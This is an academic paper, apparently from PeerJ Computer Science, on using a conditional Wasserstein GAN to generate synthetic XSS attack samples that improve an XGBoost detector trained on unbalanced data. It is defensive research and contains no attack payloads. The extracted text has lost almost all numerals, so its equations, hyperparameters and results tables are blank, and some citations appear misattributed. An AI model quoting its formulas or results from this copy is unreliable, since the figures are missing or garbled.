contributions of this study can be summarized as the following: • we proposed the wgan-based adversarial training with conditional minority class (attack labels) to generate valid and indistinguishable samples of real xss attack data. to preserve various features covering the data space range and enable the generator to learn the original data space distribution, we pass the upper and lower data space to the conditional generator. furthermore, the augmented data are not added to the mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. real training data arbitrarily; the process is performed only if the generated sample x̃ satisfies the critic. thus, it ensures that the added samples are identical to the real data and improving the training data. • we further propose a boosting classification model using the xgboost algorithm trained on the augmented training dataset generated by c-wgan-gp, which significantly improved the attack detection efficiency. • the proposed method is evaluated with two real and large unbalance xss attack datasets. experiments show that our proposed augmentation framework generates valid samples indistinguishable from real xss data and outperformed state-of-the-art methods with xss attacks detection. although we presented the proposed framework formally for xss attack detection, it can be generalized and extended to other applications areas. the rest of this study is presented as follows: in ‘related work’, we gave the most related literature. in ‘proposal and experimental methodology’, we introduced the model design and the methodology of experiments. we presented the results and discussion in ‘results and discussion’. ‘conclusions’ is the conclusion and future work. related work web applications have become part of our everyday lives and have achieved significant success and substantial financial gains for organizations; consequently, ml-based xss attacks detection has gained much attention from the research community. however, there are challenges in using ml-based methods, including finding or designing an adequate, accurate, and balanced dataset designed for ml algorithms usage. unfortunately, there is no public and standard dataset intended for this purpose (obimbo, ali & mohamed, ; nunan et al., ; mokbal et al., ), where researchers can create their datasets based on their requirements and orientation. the authors (rathore, sharma & park, ) proposed a classifier model against xss attacks for social sites using their dataset, which consists of samples collected from xssed, alexa, and elgg. they applied multiple algorithms and achieved the best results by using the random forest algorithm. however, the dataset used to train the algorithm is small, possibly selective, and may not reflect the real attacks. moreover, the dr score of . was considered inadequate. wang et al. ( ) proposed a hybrid analysis method to detect malicious web pages by extracting and using three sets of features: url, html, and javascript. the reported dr was . %, implying that the method fails to detect . % of real threats. another research work (wang, cai & wei, ) proposed a deep learning model (stacked denoising autoencoder) to detect malicious codes. they used sparse random projections to reduce the dimensions of the data. despite the model’s complexity, the dr score was . , which is inadequate for detecting malicious attacks. moreover, the model has a high fp rate of . % with a high computational cost. wang et al. ( ) used an ensemble learning method (adtree and adaboost) to detect xss attacks. however, the dr score of . is inadequate, with a high fp rate of . %. mokbal et al. ( ) proposed a scheme based on dynamic feature extraction and mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. deep neural network to detect xss attacks. using their developed dataset, they achieved an estimated dr of . %. however, the model is a deep neural network, which has potential high computational costs. multiple studies (lópez et al., ; haixiang et al., ) have thoroughly investigated the problem of unbalanced data. the problem can be mitigated at two levels: first, at the model level, by modifying existing algorithms to focus more on the minority class, such as embedding cost-sensitive methods with an ensemble learning algorithm, and second, at the data level, by preprocessing data before it is fed into the algorithm (lópez et al., ). the data-level approach uses either the undersampling or the oversampling method. undersampling mitigates class imbalance by randomly removing some samples from the majority class in the training dataset. conversely, oversampling mitigates the class imbalance by duplicating some minority class samples in the training dataset. however, these methods can result in the loss of important information and overfitting, respectively. kovács et al. ( ) proposed the synthetic minority oversampling technique (smote) as an oversampling method for the minority class. however, this method generates an equal number of synthetic samples for each real sample from the minority class without considering neighbor samples. consequently, the overlap between class increases with the potential generation of noisy samples (vluymans, ). adaptive versions of smote have been proposed, including borderline smote and dbsmote. borderline smote (han, wang & mao, ) concentrates synthetic samples along the borderline within classes. cluster-based algorithm dbsmote (bunkhumpornpat, sinapiromsaran & lursinsap, ) assembles data samples into clusters using dbscan clustering and adaptive synthetic sampling (he et al., ). however, these methods are based on local information instead of on the overall-minority class distribution (douzas & bacao, ). proposal and experimental methodology this section presents the different generative networks, including gan, cgan, wgan, and wgan-gp, in addition to our proposed model. the model architecture, experimental methodology design, xgboost attack detector, and datasets are also presented as follows. gans gan is recently introduced as a novel approach to train a generative model, which has achieved success in different fields, including images and natural language processing (goodfellow et al., ). the network comprises two adversarial models: first, the generative model g for learning the distribution of data and, second, the discriminator d, which estimates the probability that a sample is from the real training data instead of g. both models g and d in the network compete to outsmart the other where g and d can be a nonlinear mapping function, such as a multilayer perceptron. the generator g learns the distribution pg over data x and constructs a mapping function from noise space of uniform dimension pz(z) to data space as g(z,θg ). the discriminator d(x,θd) returns a single scalar to estimate the probability that an instance x came from the real data distribution rather than pg . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. both g and d are trained together, such that the parameters for g are adjusting to minimize log( −d(g(z))) and parameters for d are adjusting to minimize logd(x), similarly to the two-player minimax game accompanied by value function v (g,d) as in eq. ( ). min g max d v (g,d)=ex∼pr [ logd(x) ] +e∼ x∼pg [ log( −d(g(z))) ] ( ) a cgan extends gan by adding space y to both the g and d to control data generation. the additional space y could be supplied from real data (class label) or data from other sources (mirza & osindero, ). the training phase of both cgan and gan is similar, and the minimax objective function of d and g is as shown in eq. ( ). min g max d v (g,d)=ex∼pr [ logd ( x|y )] +e∼ x∼pg [ log ( −d ( g ( z|y ) ,y ))] ( ) where pr is the real data distribution and pg is the cgan model distribution implicitly defined as x̃ = ( z,y ) ,z ∼p(z),y ∼p(y), where y and noise z are combined as input to the hidden layer. the cgan and gan use jensen–shannon (js) divergence shown in eq. ( ) to measure generative samples. js ( pr,pg ) =kl(pr||pm)+kl(pg||pm), { kl is ullback−leibler divergence pm=(pr +pg )/ ( ) however, both gan and cgan have unstable training (vanishing gradients) and mode collapse problems (pan et al., ). to overcome these problems, the wgan optimizes the original gan objective using wasserstein- distance, also known as the earth-mover distance (emd) instead of js (arjovsky, chintala & bottou, ), where emd measures the distance between the actual distribution of the data and the distribution of the generative model as in eq. ( ). w ( pr,pg ) = inf γ ∈ ∏ (pr,pg ) e(x,y)∼γ [∣∣∣∣x−y∣∣∣∣] ( ) where ∏ (pr,pg ) represents all possible joint distribution sets (x,y) of pr and pg of real and generated data distribution, respectively. such that, for each feasible joint distribution γ , a real instance x and a generated instance y can be sampled, and the instance distance [||x−y||] is calculated. therefore, the expected value γ e(x,y)∼γ[||x−y||] of the instance to the distance under the joint distribution γ can be calculated. the value function of wgan was obtained by utilizing kantorovich–rubinstein duality (villani, ), as shown in eq. ( ). min g max d∈f v (g,d)= e x∼pr [d(x)]− e ∼ x∼pg [ d ( ∼ x )] ( ) where f is the set of -lipschitz functions restricted by k, ∣∣f(x)−f(y)≤k∣∣x−y|, and pg i is the model distribution. the value function is minimized concerning g determined by x̃ =g(z),z ∼p(z). therefore, the discriminator called a critic minimizes the w (pr,pg ). nevertheless, the wgan still faces gradient extinction or gradient explosion because of mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. weight clipping in the discriminator. the gradient penalty (gp) was added to the total loss function in the wgan distance discriminator to achieve training stability (gulrajani et al., ). the new objective value function is adjusted, as shown in eq. ( ). min g max d v (g,d)= e x∼pr [d(x)]− e ∼ x∼pg [ d ( ∼ x )] −λex̂∼px̂ [ (∇x̂d(x̂)|| − ) ] ( ) where x̂ =εx+( −ε),x̃ is a convex function combination of real data distribution pr(x) and the model data distribution pg(z), ε∼unform[ , ], whereas λ is the gradient penalty parameter. c-wgan-gp model this study proposes using data augmentation based on a gan that takes real samples as inputs and outputs adversarial samples. the learning algorithm of our proposed model is based on cgan (mirza & osindero, ) and wgan-gp (gulrajani et al., ), where both networks are integrated. precisely, we used the wgan-gp optimization approach to optimize cgan. the integrated generative network is called c-wgan-gp. our goal is to generate synthetic samples of attack class (minority) with identical distribution to real xss attack scenarios. the primary idea is to use the learning of the joint probability distribution over x samples and y labels from the training data to perform data augmentation only if the generated sample x̃ satisfy the critic. the problem of unbalanced data can be mitigated by using an augmented data in the classification tasks, therefore improving the robustness and performance of the xss attack detection for unbalanced data. a well-trained generator with joint distributions set (x,y) of pr and pg of real and generated data distribution optimized using gp should be able to generate (x̃,y) samples within the tolerated latent space and identical to the original data of (x,y), therefore providing valuable information to the detector as additional training data. to ensure that only useful instances are added to augment the training dataset, only generated cases that satisfy the critic are added to the original data. the y labels of the minority class, which are xss attacks in our case, are used as a conditional parameter. passing the upper and lower real data space to the generator provides the generator with additional auxiliary information to define the latent space. the latent space establishes the scope of samples in the data variance. therefore, the generator using the auxiliary latent space generates samples within the tolerated latent space identical to the real data. consequently, the discriminator distinguishes the synthetic samples as real within small feedback loops needed to train the generator, reducing computational cost while providing high-quality generated data. in the discriminator d, the pr and pg are linked with y in a joint hidden layer representation, whereas in generator g, the y is combined with p(z) in the same manner. the objective minimax function of models d and g is as shown in eq. ( ), whereas eqs. ( ) and ( ) represent the loss reduction functions of d and g, respectively. min g max d∈f v (g,d)= e x∼pr [ d(x|y) ] − e ∼ x∼pg [ d ( ∼ x|y )] −λex̂∼px̂ [ (∇x̂d ( x̂|y ) || − ) ] ( ) mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. min l(d)= e ∼ x∼pg [ d ( ∼ x|y )] − e x∼pr [ d ( x|y )] +λ.ex̂∼px̂ [ (∇x̂d ( x̂|y ) || − ) ] ( ) min l(g)=− e ∼ x∼pg [ d ( ∼ x|y )] ( ) generative model design generative networks have gained popularity in image data; however, we are interested in digital datasets. therefore, the technique used is similar but differs in design and implementation. in our model, we did not apply convolutional layers. in the generator model g, the concatenate input layer equal to (z + c), where z is the vectors of noise set within the range of batch size and data dimension. the c is the conditioning variable’s dimension that equals . the model has three hidden layers of the neural network—the number of units in hidden layers equal to , , and , respectively. the output layer equal to z and the concatenate layer is equal to the input layer (z + c). in the discriminator (critic) d, the same architecture is used but in descending order of hidden layers, which equal to , , , respectively. the third layer is a linear activation function that equals to . the batch size and numbers of epochs for the network are and , respectively. the activation function used for the generator and discriminator is the rectified linear unit. the c-wgan-gp is fitted using adam optimizer with α, β , and β parameters calibrated to le- , . , and . , respectively. the alpha or (α) for short refers to the learning rate, while beta (β ) and beta (β ) refer to the exponential decay rate for the first-moment and second-moment estimates, respectively. the value of the gp coefficient λ for c-wgan-gp is set to . the parameter k of d is tuned to , whereas k of g is tuned to . a conditional critic neural network is trained to approximate the emd using the minority class for control mode up to training steps. note that the parameters are defined empirically, whereas the performance reduces significantly by changing the parameters. the other different hyperparameters not mentioned are consistent with those originally reported. during the testing phase, the generated samples added to the real dataset are the samples approved by the critic. algorithm presents the generative approach for xss attack data. note that the other generator network architectures are similar, with negligible differences, which may be necessary for the implementation. mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. box . the c-wgan-gp algorithm. algorithm : c-wgan-gp required: batch size m = , n-critic = , penalty parameter = and adam optimizer parameters (𝜆 )𝑙𝑟 = . ,𝛽 = . , 𝛽 = . : for ►𝑖𝑛𝑡𝑖𝑚𝑎𝑙 𝑣𝑎𝑙𝑖𝑢𝑚𝑠 𝑐𝑟𝑖𝑡𝑖𝑐 𝑎𝑛𝑑 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟: : 𝑠𝑒𝑡 𝜃𝑐 = , 𝜃𝑔 = : 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑛𝑜𝑡 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 : ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑛 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝𝑠 𝑓𝑜𝑟 𝑑𝑖𝑠𝑐𝑟𝑖𝑚𝑖𝑛𝑎𝑡𝑜𝑟 (𝑐𝑟𝑖𝑡𝑖𝑐 ) : 𝑓𝑜𝑟 𝑡 = ,…, 𝑛_𝑐𝑟𝑖𝑡𝑖𝑐 𝑑𝑜 : 𝑓𝑜𝑟 𝑖 = ,…, 𝑚 𝑑𝑜 : 𝑆𝑎𝑚𝑝𝑙𝑒 {(𝑥𝑖,𝑦𝑖)} 𝑚𝑖 = ~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑑𝑎𝑡𝑎 𝑤𝑖𝑡ℎ 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {(𝑧𝑖)} 𝑚𝑖 = ~𝑝𝑧(𝑧), 𝑎 𝑟𝑎𝑛𝑑𝑜𝑚 𝑛𝑢𝑚𝑏𝑒𝑟 𝜀~ 𝕌[ , ] : ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒 𝑎 𝑓𝑎𝑘𝑒 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑚𝑖 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑋𝑖←𝐺(𝑧𝑖|𝑦𝑖,𝜃𝑔) : ►𝐶𝑜𝑚𝑝𝑢𝑡 𝑝𝑒𝑛𝑎𝑙𝑡𝑟𝑦 𝐺𝑝 𝑎𝑛𝑑 𝑙𝑜𝑠𝑠 𝑓𝑜𝑟 𝑐𝑟𝑖𝑡𝑖𝑐 : 𝑥𝑖←𝜀𝑥𝑖 + ( ‒ 𝜀)𝑥𝑖 : 𝐺𝑝(𝜃𝑐)← 𝑚∑𝑚𝑖 = [𝑚𝑎𝑥(‖∇𝑥 �ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)|| ‒ ) ] : 𝔼(𝜃𝑐)←∇𝜃𝑐[ 𝑚∑𝑚𝑖 = ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐) ‒ 𝑚∑𝑚𝑖 = ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)] + 𝜆.𝐺𝑝(𝜃𝑐) : 𝑒𝑛𝑑𝑓𝑜𝑟 : 𝜃𝑐←𝐴𝑑𝑎𝑚(𝔼𝜃𝑐,𝜃𝑐,𝛼,𝛽 ,𝛽 ) : 𝑒𝑛𝑑𝑓𝑜𝑟 : ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑎 𝑠𝑖𝑛𝑔𝑙𝑒 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟 𝐺 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 {𝑦𝑖} 𝑚𝑖 = ~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {𝑧𝑖} 𝑚𝑖 = ~𝑝𝑧(𝑧) : ►𝐶𝑜𝑚𝑝𝑢𝑡𝑒 𝑔𝑟𝑎𝑑𝑖𝑒𝑛𝑡 𝑤𝑖𝑡ℎ 𝑟𝑒𝑠𝑝𝑒𝑐𝑡 𝑡𝑜 𝑡ℎ𝑒 𝐺 𝑝𝑎𝑟𝑎𝑚𝑒𝑡𝑒𝑟𝑠 : 𝔼(𝜃𝑔)←∇𝜃𝑔[ 𝑚∑𝑚𝑖 = ℱ(𝑔(𝑧𝑖|𝑦𝑖,𝜃𝑔)|𝑦𝑖,𝜃𝑐) : 𝜃𝑔←𝐴𝑑𝑎𝑚( ‒ 𝔼𝜃𝑔,𝜃𝑐,𝛼,𝛽 ,𝛽 ) : 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 : 𝑙𝑜𝑎𝑑 𝑡ℎ𝑒 𝑏𝑒𝑠𝑡 𝑠𝑡𝑒𝑝 𝑤𝑒𝑖𝑔ℎ𝑡 𝑓𝑜𝑟 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑖𝑣𝑒 𝑛𝑒𝑡 : 𝑑𝑎𝑡𝑎_ 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 [ ] : 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡 𝑋𝑖 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 : for each 𝑠𝑎𝑚𝑝𝑙𝑒 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 𝑑𝑜 : 𝑖𝑓 𝑋𝑖 𝑠𝑎𝑡𝑖𝑠𝑓𝑦 𝑡ℎ𝑒 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡ℎ𝑒𝑛 : 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑.𝑎𝑝𝑝𝑒𝑛𝑑 [𝑋𝑖] : 𝑒𝑛𝑑 𝑓𝑜𝑟 : 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 : 𝐽𝑜𝑖𝑛 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 𝑋𝑖 𝑡𝑜 𝑡ℎ𝑒 𝑑𝑎𝑡𝑎𝑠𝑒𝑡 𝑥𝑖 : 𝑡𝑟𝑒𝑎𝑡𝑖𝑛𝑔 𝑎 𝑛𝑒𝑤 𝑋𝐺𝐵𝑜𝑜𝑠𝑡 𝑚𝑜𝑑𝑒𝑙 peerj comput. sci. reviewing pdf | (cs- : : : : :new oct ) manuscript to be reviewedcomputer science experimental methodology this study proposed generative model c-wgan-gp, an oversampling solution of minority class to solve unbalanced xss attack data. we trained the detector (xgboost) using the real training dataset and test it using the test dataset before without augmented data, and then the results were recorded for comparison. subsequently, we trained each of the gans models using real training dataset to generate synthetic data. we repeated the training of the detector using the augmented data and test it using the test dataset. the results of each model were recorded for comparison. similarly, traditional oversampling methods were trained and tested. the c-wgan-gp generator performance was evaluated in two directions. first, we assessed the performance of the c-wgan-gp generative adversarial network against the mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. other four gans. second, we compared our c-wgan-gp model with two traditional oversampling methods include smote (han, wang & mao, ) and adaptive synthetic (adasyn) (bunkhumpornpat, sinapiromsaran & lursinsap, ). the systemic flowchart of the proposal is shown in fig. . detector we use an external model to evaluate the quality of the data generated by our proposed method and other methods. the xgboost boosting model was used for all experiments to assess the augmented data’s quality on xss attack detection performance. the xgboost is a state-of-the-art boosting algorithm that is simple to apply and interpret, is highly efficient, does not require advanced data preparation, and has many advanced functions (chen & guestrin, ). the algorithm’s learning rate, tree size, and tree number hyperparameters tuned to . , , and , respectively. datasets to our knowledge, there is only one public dataset for intrusion detection that includes xss attacks that we were able to find called cicids designed by the canadian institute of cybersecurity (sharafaldin, habibilashkari & ghorbani, ). the released cicids dataset contains features that include regular traffic and recent common attacks. to provide attack features, we used a cicflowmeter tool to extract features from pcaps files and used selenium with damn vulnerable web application to run automatic xss attacks. however, there are only xss attacks traffic, and over , regular traffic, making it a highly unbalanced dataset. we have added another dataset proposed in our previous work (mokbal et al., ). the dataset includes features with labels that are categorized based on three groups, including html, javascript, and url. we extracted , xss attack samples and , benign samples as a second dataset. we applied data preprocessing to each dataset. in both datasets, all samples have two classes, xss attack and benign, which are set to [ , ], respectively. the two datasets were split randomly into training and test sets with a % and % ratio, respectively, where data augmentation was performed only on the training dataset. missing and infinite values in cicids were updated using their features’ mean values, whereas the zero features and duplicate rows were omitted. the number of features with clean data in the cicids dataset is , and the number of features with clean data in the second dataset is . subsequently, the data’s scale within the range [ , ] was applied using the minimax function for both datasets. the class-level distribution of datasets is shown in table . the datasets are available at https://doi.org/ . /m .figshare. .v . performance evaluation criteria although many performance metrics have been introduced, gans do not have an objective measure of the generator model, as there is no consensus on the best metric that captures the strength/limitations of the model and should be used for a fair comparison between models (borji, ). we used precision, detectionrate(dr)/ recall, and f −score, which are proven and widely adopted methods for quantitatively estimating the quality of discriminative mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. unbalanced dataset testing data training data min max scaling preprocessing classifier training augmented data result benign attack -fold cross validation (cv) append the sample generated jointed real and generated data critic (d) generator (g) accepted no yes fine-tuning training a tt a ck c la ss n o is e r e a l tr a in in g d a ta c-wgan-gp xgboost figure systemic flowchart of c-wgan-gp. full-size doi: . /peerjcs. /fig- table the class-level distribution of the datasets. id dataset #samples #attributes minority class majority class #minority samples #majority samples cicids (sharafaldin, habibilashkari & ghorbani, ) , attack benign , mlpxss (mokbal et al., ) , attack benign , models suggested by google brain research (lucic et al., ). precision measures the generated instances similarity to the real ones on average. whenever the instances generated are similar to the real instances, the precision is high. in gans, the recall (detection rate) measures diversity. a high recall indicates the generator can generate any instances found in the training dataset. for cybersecurity detection sys, the recall/detection rate denotes the ability of sys to detect the real attacks. the f-score reflects the harmonic mean of precision and recall. further, the area under the curve (auc) measure that demonstrates a detector’s ability to distinguish between classes and summarizes the detector’s performance is also collected. the measurements are defined as follows. precision= tp (tp+fp) ( ) dr= tp (tp+fn) ( ) mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. f−score= ( (recall×precision) (recall+precision) ) ( ) auc = ( tp tp+fn + tn tn +fp ) ( ) results and discussion the c-wgan-gp-based data augmentation approach was implemented in python . using the tensorflow framework on linux operating system. the proposed method was implemented alongside four other gan-based generative methods and two traditional generative methods (smote and adasyn). all the methods were validated using -fold cross-validation. to demonstrate how the attack dr decreased as the gap between normal and malicious classes increased, we injected different ratios of the majority class in the training data to train the xgboost detector model using auc and dr criteria. the model tested on the fixed test dataset size of % each time. during the attack detection test, the results show that dr decreased from . % with an injected ratio of % of the majority class to approximately . % with an injected ratio of % of the majority class. these results are shown in table . using our generative approach, we injected the generated data into a real training dataset to create a new augmented training dataset. the augmented data were used to train the xss attack detector, which is different from the generative framework to judge the data quality. the detector was tested using the real test dataset. this experiment mechanism was applied to all of the methods we used, and results were reported for each scenario. the average results reported in each trial on the cicids dataset are shown in table (sharafaldin, habibilashkari & ghorbani, ). using the same mechanism, we repeated the experiments using the dataset extracted from our previous work (mokbal et al., ), and the results are shown in table . notably, using augmented data generated by the proposed method significantly improved the xss attacks detection compared with state-of-the-art baseline methods. the results in tables and show that the dr increased up to . % in the cicids dataset and up to . % in the second dataset. that is, our generative model able to generate any sample found in the xss attack training dataset. the precision measure is also high, which equals . on the first dataset and . on the second dataset. the precision results imply that the proposed generative model generated samples look similar to the real xss attack samples on average. concerning f-score, the proposed generative model was superior to other generative methods. it achieved the result score of . in the first data set and the score of . in the second dataset. the auc measure of the proposed generative model is also continued to be outperformed the other methods in both datasets with a significant margin. mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the collapse of the detection rate as the unbalanced classes’ gap increased. ratio train-auc mean train-auc std train-recall mean train-recall std test-auc mean test-auc std test-recall mean test-recall std % . . . . . . . . % . . . . . . . . % . . . . . . . . % . . . . . . . . % . . . . . . . . table detection results using data augmented generated through different methods on the cicids dataset. criteria none adasyn smote gan cgan wgan wgan-gp c-wgan-gp dr (sensitivity) . . . . . . . . specificity . . . . . . . . precision . . . . . . . . f-score . . . . . . . . auc . . . . . . . . table detection results using data augmented generated through different methods on the second dataset. criteria none adasyn smote gan cgan wgan wgan-gp c-wgan-gp dr (sensitivity) . . . . . . . . specificity . . . . . . . . precision . . . . . . . . f-score . . . . . . . . auc . . . . . . . . the results for adasyn, wgan-gp, wgan, smote, and cgan showed improved dr performance, respectively, with varying proportions. the effects of the additional samples on the xss attack dr under the condition of acceptance by the discriminator on the cicids dataset are shown in fig. along with standard deviation. the standard deviation of the c-wgan-gp is overall small compared to other methods; it also decreases as training steps increase. while the standard deviation of cgan and wgan is not smooth and shows more variation. the standard deviation of wgan-gp was smoother than gan and wgan but less smooth and more varied than c-wgan-gp. this fact indicates the stability of c-wgan-gp training to some extent. the results suggest that the c-wgan-gp significantly outperformed cgan, wgan and wgan-gp. the superiority of the c-wgan-gp over the rest of the gans is due to the fact that the model is enhanced with the characteristics of two generative networks, cgan and wgan- gp. the c-wgan-gp used minority class labels that act as an extension to the latent space z to generate and discriminate instances well, which inspired from cgan. consequently, the model can learn a multi-modes mapping from inputs to outputs by feeding it with different contextual auxiliary information. the c-wgan-gp optimized using wasserstein distance with gradient penalty inspired by wgan-gp. the training process is more stable mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of the data augmentation on the xss attack detection rate over the baseline for gan, wgan, wgan-gp, and c-wgan-gp. (a) cgan detection rate, (b) wgan detection rate, (c) wgan-gp detection rate, and (d) c-wgan-gp detection rate. the red horizontal dashed line indicates the baseline estimate of each generative model. full-size doi: . /peerjcs. /fig- and less sensitive to model design and configurations of hyperparameter. further, the loss of the critic is related to the quality of instances created by the generator. precisely, the lower the critic’s loss when evaluating the instances generated, the higher the expected quality of the instances generated. this criterion is crucial because unlike other gans that seek stability by finding a balance between two models, wgan seeks convergence and minimizes generator loss. furthermore, adding the generated samples of cgan, wgan, and wgan-gp that satisfied the discriminator’s acceptance condition (critic) adds value to the augmented training dataset, which increases detector ability and efficiency. the loss of generated data for c-wgan-gp compared with that of the other four gan methods is shown in fig. . it is quite clear that the loss curve of c-wgan-gp decreased regularly and continuously compared to all other generative methods. the loss curves of gan and cgan are unstable, and the models went to collapse mode during the generating phase. the wgan and wgan–gp loss curves decreased regularly; however, it is high compared with c-wgan-gp. note that gan and cgan are using js divergence, whereas wgan and c-wan-gp are using the wasserstein distance or emd. similarly, in the loss curve of real data, the gan and cgan face difficulty learning the training data distribution. in contrast, the wgan and wgan–gp losses decreased regularly; however, it is high compared with c-wgan-gp. the c-wgan-gp seems to learn the training data distribution better than all other generative methods, as shown in fig. . to estimate the proposed method’s generalization ability, we investigated the wasserstein critic, in which the distance between actual and generated data losses is calculated. this estimate demonstrates how much the data generated by the proposed model and real data are identical. the difference in distance between the real and generated data distribution of wgan, wgan-gp, and c-wgan-gp that generative models learn to minimize is shown in fig. . the distance between generated and real data of c-wgan-gp is close to zero. that is, the c-wgan-gp generated samples that are identical to real data distribution; further, the training stability of the proposed generative model is adequate. for further clarification, the xgboost classification accuracy trained on the five different generative methods’ data is shown in fig. . the xgboost accuracy curve of c-wgan-gp data is higher than that of other models, which indicates the quality of the data generated mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. training step . . . . . . g en er at ed l os se s gan cgan wgan wgan_gp c_wgan_gp figure the loss of generated data. full-size doi: . /peerjcs. /fig- training step . . . . . . . . r ea l l os se s gan cgan wgan wgan_gp c_wgan_gp figure the loss of real data. full-size doi: . /peerjcs. /fig- by the proposed model. figure shows a general visualization example of the data quality generated by c-wgan-gp compared with other generative methods and displays the collapse mode of gan and cgan between and of training steps in the second dataset. in addition to the beginning of the gradient extinction of wgan at of training steps. conclusions this study proposed a conditional critic neural network with a gradient penalty called c- wgan-gp to improve the xss attack detection on unbalanced datasets. the c-wgan-gp mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. training step . . . . g en er at ed - a ct ua l c rit ic l os s wgan wgan_gp c_wgan_gp figure difference between critic (em distance estimate) loss on generated and real samples. full-size doi: . /peerjcs. /fig- training step . . . . . . . x g b bo os t a cc ur ac y gan cgan wgan wgan_gp c_wgan_gp figure the detector loss function over various generated data. full-size doi: . /peerjcs. /fig- is trained to approximate the em distance with an auxiliary of minority class for control mode to generate valid and reliable synthetic samples with identical distribution to real xss attack scenarios. we trained a new boosting model using the augmented dataset to improve the xss attack detection system and mitigate an unbalanced dataset problem. we conducted experiments to compare the proposed method with gan, cgan, wgan, wgan-gp, smote, and adasyn using two real-world xss attack datasets. experimental results show that the proposed method can train a generator model with improved training stability. the proposed method enhanced the detection of xss attacks and prevented adversarial examples that have been widely used to target ai cyber defense systems. furthermore, the mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . html_tag_script . . . js _s tr in g_ m ax _l en gt h a class class . . html_tag_script . . . b . . html_tag_script . . . c . . html_tag_script . . . d . . html_tag_script . . . e . . html_tag_script . . . f . . html_tag_script . . . js _s tr in g_ m ax _l en gt h g . . html_tag_script . . . h . . html_tag_script . . . i . . html_tag_script . . . j . . html_tag_script . . . k . . html_tag_script . . . l . . html_tag_script . . . js _s tr in g_ m ax _l en gt h m . . html_tag_script . . . n . . html_tag_script . . . o . . html_tag_script . . . p . . html_tag_script . . . q . . html_tag_script . . . r . . html_tag_script . . . js _s tr in g_ m ax _l en gt h s . . 